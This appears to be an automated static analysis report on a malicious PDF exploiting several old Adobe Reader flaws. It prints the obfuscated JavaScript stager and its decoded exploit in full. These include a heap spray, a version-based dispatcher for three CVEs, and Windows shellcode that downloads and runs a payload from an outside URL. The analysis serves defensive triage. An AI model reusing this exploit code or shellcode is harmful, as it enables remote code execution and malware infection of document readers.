Malicious PDF — malware analysis report

Static analysis result for SHA-256 2aee5f8c9fbdc8d7…

MALICIOUS

PDF

4.4 KB Created: 2009-29-08 10:55:24 +03:00 Authoring application: fackoPDF 7.02 (via BCL macroPDF 7.01) First seen: 2026-05-08
MD5: 595a6af282f9503240f2b8d01d0190f9 SHA-1: a07351a91e9e64dd389871cf6bc4d58ed4b0bebe SHA-256: 2aee5f8c9fbdc8d7ec13b8d794a08ca613256225a8e826a92817fdd5d1c7f351
372 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Quoted-hex fragment JavaScript stager high PDF_QUOTED_HEX_FRAGMENT_JS_STAGER
    PDF JavaScript stores the hidden exploit stage as many quoted hexadecimal fragments, joins them through helper functions, and evals the recovered JavaScript. The decoder is bounded and only fires when the recovered stage contains concrete Acrobat exploit APIs or heap-spray shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://socks5service.cn/u2/getexe.php Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0015_000.js pdf-javascript-stream PDF /JS object 15 at offset 0x317 9057 bytes
SHA-256: c237d3757f1e5f570a506e916c1e1d843dd290f229fe0cda5ac8f9676f39e50e
Preview script
First 1,000 lines of the extracted script
tratat = eval;function n97FqT (sda) {tratat(decodeURIComponent(sda));}function g1ysrI(d9Uv3A, uriuSo) {return ((uriuSo instanceof Array)?uriuSo.join(d9Uv3A):uriuSo);}function m1F8h56vm67NvbauZ() {var Ysx18o=new Array('20207661722055614866','784152397142734d5065','634a203d206e6577204172726179','28293b202076617220726e624f43','4b4c327875433669','4537533b202066756e6374696f6e','204b4f386e5a5a77','506c6f6d42544f5573287a37474f','5262505057635545726167682c2078','6f55594f517930466b','4b6a3070624c297b20202020','7768696c6520287a3747','4f5262505057635545726167','682e6c656e677468202a2032203c2078','6f55594f517930466b4b6a30','70624c297b2020202020207a37474f5262','50505763554572616768202b3d20','7a37474f52625050576355457261','67683b202020207d2020','20207a37474f52','625050576355','4572616768203d207a3747','4f5262505057635545726167682e','73756273747269','6e6728302c2078','6f55594f517930466b4b6a3070624c','202f2032293b202020','207265747572','6e207a37474f5262505057635545726167683b20','207d202066756e6374696f6e206d736a4e','54306d316d48456473764c72286c7051','39474f4857306346','495371644f297b2020','202076617220464e6d4457','5a4449715277694e4861','38203d20307830633063306330633b2020','2020766172207331464e5057');var bvjRob50IaNw8jP8z=g1ysrI("", Ysx18o);return bvjRob50IaNw8jP8z;}function TckqhrEdSpX3YSl1G() {var Ysx18o=new Array('74593030716231557a6a203d2075','6e657363617065282225754330333325','75384236342575333034302575304337','3825753430384225753842304325753143373025','75384241442575','30383538257530394542257534','303842257538443334257537433430257535','3838422575364133432575354134','3425754532443125754532324225','754543384225','7534464542257535323541257545','413833257538393536257530343535','25753537353625','75373338422575384233432575333337','34257530333738257535364633','2575373638422575','303332302575','3333463325753439433925753431','353025753333414425753336464625','754245304625','75303331342575463233','38257530383734257543464331','2575303330442575','3430464125754546454225753342353825','753735463825753545453525753436384225','7530333234257536364333257530433842','25753842343825753143353625754433','3033257530343842257530','3338412575354643332575','3530354525753844433325753038374425','75353235372575333342382575384143','4125754538354225754646413225','7546464646257543303332','2575463738422575','414546322575423834','4625753245','3635257537383635257536364142257536','3639382575423041422575384136432575');var W5QfenclX2sWYiaAS=g1ysrI("", Ysx18o);return W5QfenclX2sWYiaAS;}function AeVlT3n3VZ3mx7Ccl() {var Ysx18o=new Array('3938453025753638353025','75364536462575363432452575373536','3825753643373225753534364425','7538454238257530','4534452575464645432575303435352575353039','33257543303333257535303530257538423536','25753034353525','75433238332575383337','462575333143322575','353035322575','333642382575324631412575464637','3025753034353525753333354225','7535374646257542383536','2575464539','3825753045384125','75353546462575353730','3425754546423825754530434525754646','363025753034353525753734363825753730','37342575324633412575373332462575','36333646257537','333642257537','33333525753732','36352575363937362575363536332575363332','452575324636452575333237352575363732');var iEXXGQ5p9eza6stkO=g1ysrI("", Ysx18o);return iEXXGQ5p9eza6stkO;}function HTGw4Ji1QudBvsjT9() {var Ysx18o=new Array('46257537343635257537383635257532453635','25753638373025753030','373022293b202020206966','20286c705139474f48573063464953','71644f203d3d2031297b20202020','2020464e6d44575a4449715277694e48','6138203d2030','7833303330333033303b','202020207d2020202076617220','5a6d774e4c306742626375','7974553631203d2030783430303030303b','2020202076617220544b4f7572485331524a6252','6f62416620','3d207331464e5057','7459303071','6231557a6a2e6c656e6774','68202a20323b2020202076617220','786f55594f517930466b4b6a3070','624c203d205a6d774e4c30674262637579745536','31202d2028544b','4f7572485331524a6252','6f624166202b2030783338','293b20202020766172207a37474f5262505057','63554572616768203d20','756e6573636170652822257539303930257539','30393022293b202020207a37474f52','6250505763554572616768203d204b4f38','6e5a5a77506c6f6d42544f5573287a37474f52','625050576355','45726167682c20','786f55594f51793046','6b4b6a3070624c293b2020202076','6172204f383469476a75734d','6f71464a77476e203d2028464e6d4457','5a4449715277','694e486138202d2030','7834303030303029202f205a6d774e4c306742','62637579745536313b20202020666f7220287661','7220466568397741304e55','6b70494d7a786b');var fXxHCxsHqm2ERFevW=g1ysrI("", Ysx18o);return fXxHCxsHqm2ERFevW;}function cJyFEbR0TAccJAabM() {var Ysx18o=new Array('203d20303b20466568397741304e556b','70494d7a786b203c204f383469476a7573','4d6f71464a77476e3b2046656839774130','4e556b70494d7a786b202b2b2029','7b20202020202055614866784152397142734d50','65634a5b466568397741304e556b70494d7a78','6b5d203d207a37474f52625050','5763554572616768202b207331464e5057','74593030716231557a','6a3b202020207d20207d202066756e637469','6f6e205032544e6c','4e463843374e563364','4a4a28297b20202020766172207832534542','6263674d52796a5276545820','3d20303b2020202076617220547776694b417057','4844334b714c6530203d20617070','2e766965776572','56657273696f6e2e746f537472696e','6728293b2020202061','70702e636c65617254696d654f7574','28726e624f434b4c32787543366945','3753293b202020','20202069662028547776694b417057','4844334b714c6530203c','20372e31297b','2020202020206d736a4e5430','6d316d48456473764c722830','293b20202020202076617220');var bTeNGgbhvGdSrbHBZ=g1ysrI("", Ysx18o);return bTeNGgbhvGdSrbHBZ;}function DyZe9CHSMr4jOXOmn() {var Ysx18o=new Array('4c374f596931453553446e7430475237203d','20756e6573636170','65282225753063306325753063306322293b2020','202020207768696c6520284c374f59693145','3553446e74304752372e6c656e677468203c2034','34393532294c374f596931453553446e74304752','37202b3d204c374f59693145','3553446e74304752373b2020202020207468','6973202e636f6c6c616253746f','7265203d20436f','6c6c61622e','636f6c6c656374456d61','696c496e666f','287b20202020202020207375626a203a','2022222c206d7367203a204c374f59','6931453553446e74304752','372020202020207d20202020','2020293b202020207d20206966','2028547776694b4170','574844334b714c6530203e3d2039297b202020','2020207472','79207b2020696620286170702e64','6f632e436f6c6c61622e','67657449636f6e297b202020202020202020206d','736a4e54306d316d','48456473764c722832293b20202020202020','20202076617220764e6f585965357072373069');var IOV1e9SWjjhJG8UEg=g1ysrI("", Ysx18o);return IOV1e9SWjjhJG8UEg;}function sQpFIszhPNTDSriSW() {var Ysx18o=new Array('536e7270203d20756e65','73636170652822253039','22293b2020202020202020','20207768696c652028','764e6f585965357072','373069536e72702e6c656e677468203c203078','3430303029','764e6f585965','357072373069536e7270202b3d20764e6f585965','357072373069536e72703b2020','202020202020202076','4e6f58596535707237306953','6e7270203d20224e2e2220','2b20764e6f5859','65357072373069536e72','703b20206170702e646f632e436f6c6c61','622e67657449636f6e28764e6f58','5965357072373069536e7270293b20','202020202020202020','78325345426263674d','52796a52765458203d20313b2020','2020202020207d2020202020202020656c73','65207b20202020202020202020783253','45426263674d52796a52765458','203d20313b20202020','202020207d2020202020207d202020202020');var lu4aeluvtPAaZXT1M=g1ysrI("", Ysx18o);return lu4aeluvtPAaZXT1M;}function kize7TsYLb1sSvv4a() {var Ysx18o=new Array('636174636820','2865297b202020','20202020207832','5345426263674d52796a5276','5458203d20313b202020','2020207d202020202020696620','2878325345426263674d52796a52765458','203d3d2031297b202020202020','20206966202828547776694b417057484433','4b714c6530203e3d20372e312626','20547776694b4170574844334b714c6530203c20','3929297b2020202020','20202020206d','736a4e54306d316d48456473764c72283129','3b20202020202020202020','7661722057464f63476467697155637a','6c353679203d202231323939','39393939393939393939393939393939223b2020','2020202020202020666f7220','284d75577a59616f516879','39306d7a7a67203d20303b','204d75577a59616f51','687939306d7a7a67203c203237363b204d','75577a59616f51687939306d7a7a6720');var XxVaNfAwCdwYMEn6E=g1ysrI("", Ysx18o);return XxVaNfAwCdwYMEn6E;}function YKl3vmuOhqRHXPn8m() {var Ysx18o=new Array('2b2b20297b2020202020202020','2020202057464f63','476467697155637a6c35','3679202b3d202238223b2020202020','20202020207d202020202020202020207574696c','2e7072696e7466282225343530303066222c','2057464f63476467697155','637a6c353679','293b20202020202020207d20','20202020207d202020207d','20207d20206170702e744e4956327a457255','7172467678454d203d20503254','4e6c4e463843374e5633644a','4a3b2020726e624f434b4c32','7875433669453753203d','206170702e73657454696d654f','75742822617070','2e744e4956327a45','72557172467678454d2829222c20313029','3b2020');var uHjfvfEIu3O9UaqpL=g1ysrI("", Ysx18o);return uHjfvfEIu3O9UaqpL;}var Jn0pda8=m1F8h56vm67NvbauZ()/*GHaK3r&a3*/+TckqhrEdSpX3YSl1G()/*GHaK3r&a3*/+AeVlT3n3VZ3mx7Ccl()/*GHaK3r&a3*/+HTGw4Ji1QudBvsjT9()/*GHaK3r&a3*/+cJyFEbR0TAccJAabM()/*GHaK3r&a3*/+DyZe9CHSMr4jOXOmn()/*GHaK3r&a3*/+sQpFIszhPNTDSriSW()/*GHaK3r&a3*/+kize7TsYLb1sSvv4a()/*GHaK3r&a3*/+YKl3vmuOhqRHXPn8m();var upEvKV="";for (var h=0;h<Jn0pda8.length;h++) {upEvKV=upEvKV+"%"+Jn0pda8[h]+Jn0pda8[h+1];h++;}n97FqT(upEvKV);
quoted_hex_fragment_stage_000.js deobfuscated-js quoted-hex fragment decoded JavaScript object 15 at offset 0x3F1 3310 bytes
SHA-256: d8d2b9e664b73a431ec22735ba4b4cd1fb9bbc144a7f366a0fd7d97adaeb1049
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var UaHfxAR9qBsMPecJ = new Array();  var rnbOCKL2xuC6iE7S;  function KO8nZZwPlomBTOUs(z7GORbPPWcUEragh, xoUYOQy0FkKj0pbL){    while (z7GORbPPWcUEragh.length * 2 < xoUYOQy0FkKj0pbL){      z7GORbPPWcUEragh += z7GORbPPWcUEragh;    }    z7GORbPPWcUEragh = z7GORbPPWcUEragh.substring(0, xoUYOQy0FkKj0pbL / 2);    return z7GORbPPWcUEragh;  }  function msjNT0m1mHEdsvLr(lpQ9GOHW0cFISqdO){    var FNmDWZDIqRwiNHa8 = 0x0c0c0c0c;    var s1FNPWtY00qb1Uzj = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u636F%u736B%u7335%u7265%u6976%u6563%u632E%u2F6E%u3275%u672F%u7465%u7865%u2E65%u6870%u0070");    if (lpQ9GOHW0cFISqdO == 1){      FNmDWZDIqRwiNHa8 = 0x30303030;    }    var ZmwNL0gBbcuytU61 = 0x400000;    var TKOurHS1RJbRobAf = s1FNPWtY00qb1Uzj.length * 2;    var xoUYOQy0FkKj0pbL = ZmwNL0gBbcuytU61 - (TKOurHS1RJbRobAf + 0x38);    var z7GORbPPWcUEragh = unescape("%u9090%u9090");    z7GORbPPWcUEragh = KO8nZZwPlomBTOUs(z7GORbPPWcUEragh, xoUYOQy0FkKj0pbL);    var O84iGjusMoqFJwGn = (FNmDWZDIqRwiNHa8 - 0x400000) / ZmwNL0gBbcuytU61;    for (var Feh9wA0NUkpIMzxk = 0; Feh9wA0NUkpIMzxk < O84iGjusMoqFJwGn; Feh9wA0NUkpIMzxk ++ ){      UaHfxAR9qBsMPecJ[Feh9wA0NUkpIMzxk] = z7GORbPPWcUEragh + s1FNPWtY00qb1Uzj;    }  }  function P2TNlNF8C7NV3dJJ(){    var x2SEBbcgMRyjRvTX = 0;    var TwviKApWHD3KqLe0 = app.viewerVersion.toString();    app.clearTimeOut(rnbOCKL2xuC6iE7S);      if (TwviKApWHD3KqLe0 < 7.1){      msjNT0m1mHEdsvLr(0);      var L7OYi1E5SDnt0GR7 = unescape("%u0c0c%u0c0c");      while (L7OYi1E5SDnt0GR7.length < 44952)L7OYi1E5SDnt0GR7 += L7OYi1E5SDnt0GR7;      this .collabStore = Collab.collectEmailInfo({        subj : "", msg : L7OYi1E5SDnt0GR7      }      );    }  if (TwviKApWHD3KqLe0 >= 9){      try {  if (app.doc.Collab.getIcon){          msjNT0m1mHEdsvLr(2);          var vNoXYe5pr70iSnrp = unescape("%09");          while (vNoXYe5pr70iSnrp.length < 0x4000)vNoXYe5pr70iSnrp += vNoXYe5pr70iSnrp;          vNoXYe5pr70iSnrp = "N." + vNoXYe5pr70iSnrp;  app.doc.Collab.getIcon(vNoXYe5pr70iSnrp);          x2SEBbcgMRyjRvTX = 1;        }        else {          x2SEBbcgMRyjRvTX = 1;        }      }      catch (e){        x2SEBbcgMRyjRvTX = 1;      }      if (x2SEBbcgMRyjRvTX == 1){        if ((TwviKApWHD3KqLe0 >= 7.1&& TwviKApWHD3KqLe0 < 9)){          msjNT0m1mHEdsvLr(1);          var WFOcGdgiqUczl56y = "12999999999999999999";          for (MuWzYaoQhy90mzzg = 0; MuWzYaoQhy90mzzg < 276; MuWzYaoQhy90mzzg ++ ){            WFOcGdgiqUczl56y += "8";          }          util.printf("%45000f", WFOcGdgiqUczl56y);        }      }    }  }  app.tNIV2zErUqrFvxEM = P2TNlNF8C7NV3dJJ;  rnbOCKL2xuC6iE7S = app.setTimeOut("app.tNIV2zErUqrFvxEM()", 10);

Open this report in the interactive analyzer, or submit your own file for analysis.